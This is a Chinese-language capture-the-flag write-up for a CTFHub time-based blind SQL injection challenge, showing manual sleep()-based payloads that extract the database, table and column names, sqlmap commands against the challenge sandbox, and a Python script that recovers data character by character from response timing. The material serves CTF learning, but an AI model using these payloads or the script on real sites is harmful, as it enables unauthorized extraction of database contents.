CTFHub-web(sql时间盲注)

手工注入

1. 题目信息

2. 页面3秒钟后才响应，说明数据库名称长度=4

1 and if(length(database())=4,sleep(3),1)

3. 猜解数据库名称

1 and if(ascii(substr(database(),1,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)	ascii(s)=115

1 and if(ascii(substr(database(),2,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)	ascii(q)=113

1 and if(ascii(substr(database(),3,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),3,1))=108,sleep(3),1)	ascii(l)=108

1 and if(ascii(substr(database(),4,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)	ascii(i)=105

......
不断调整ASCII码的范围逐渐得到数据库名称为sqli

4. sqli数据库中表的数量

1 and if((select count(table_name) from information_schema.tables
 where table_schema=database())=2,sleep(3),1)

页面3秒后响应，说明有两张表

5. 猜解表名

1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)
  ascii(n)=110

3秒后响应，说明第一张表的第一个字母为n
依次得到表名为news

1 and if(ascii(substr((select table_name from information_schema.tables
  where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)
  ascii(f)=102

3秒后响应，说明第一张表的第一个字母为f
依次得到表名为flag

6. 猜解flag表的字段数

1 and if((select count(column_name) from information_schema.columns
 where table_name='flag')=1,sleep(3),1)

3秒后响应，只有一个字段

7. 猜解字段名

1 and if(ascii(substr((select column_name from information_schema.columns
 where table_name='flag'),1,1))=102,sleep(3),1)

一样的套路，得到字段名为flag

8. 猜解flag具体值
庞大的工作量太过耗时，所以到此为止，开始sqlmap注入

sqlmap注入

我是在Kali Linux下执行的
Windows如何安装使用SQLMap见：
https://blog.csdn.net/weixin_45254208/article/details/104697014

1. 数据库名称
Kali:

sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox.
ctfhub.com:10080/?id=1" --dbs

Windows:

python sqlmap.py -u "http://challenge-3c2ee474fb29b646.sandbox.
ctfhub.com:10080/?id=1" --dbs

注意二者区别，后面以Kali为例，不再赘述

2. 数据表名称

sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox.
ctfhub.com:10080/?id=1" -D sqli --tables

3. 字段名，flag

sqlmap -u "http://challenge-3c2ee474fb29b646.sandbox.
ctfhub.com:10080/?id=1" -D sqli -T flag --columns --dump

这里环境时间到了，最后一小部分flag没显示出来

使用脚本

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import requests
import sys
import time

session=requests.session()
url = "http://challenge-e53e5a329b0199fa.sandbox.ctfhub.com:10080/?id="
name = ""

for k in range(1,10):
	for i in range(1,10):
		print(i)
		for j in range(31,128):
			j = (128+31) -j
			str_ascii=chr(j)
			#数据库名
			payolad = "if(substr(database(),%s,1) = '%s',sleep(1),1)"%(str(i),str(str_ascii))
			#表名
			#payolad = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',sleep(1),1)" %(k,i,str(str_ascii))
			#字段名
			#payolad = "if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),%d,1) = '%s',sleep(1),1)" %(i,str(str_ascii))
			start_time=time.time()
			str_get = session.get(url=url + payolad)
			end_time = time.time()
			t = end_time - start_time
			if t > 1:
				if str_ascii == "+":
					sys.exit()
				else:
					name+=str_ascii
					break
		print(name)

#查询字段内容
for i in range(1,50):
	print(i)
	for j in range(31,128):
		j = (128+31) -j
		str_ascii=chr(j)
		payolad = "if(substr((select flag from sqli.flag),%d,1) = '%s',sleep(1),1)" %(i,str_ascii)
		start_time = time.time()
		str_get = session.get(url=url + payolad)
		end_time = time.time()
		t = end_time - start_time
		if t > 1:
			if str_ascii == "+":
				sys.exit()
			else:
				name += str_ascii
				break
	print(name)

总结

和布尔盲注思路类似，使用sqlmap很关键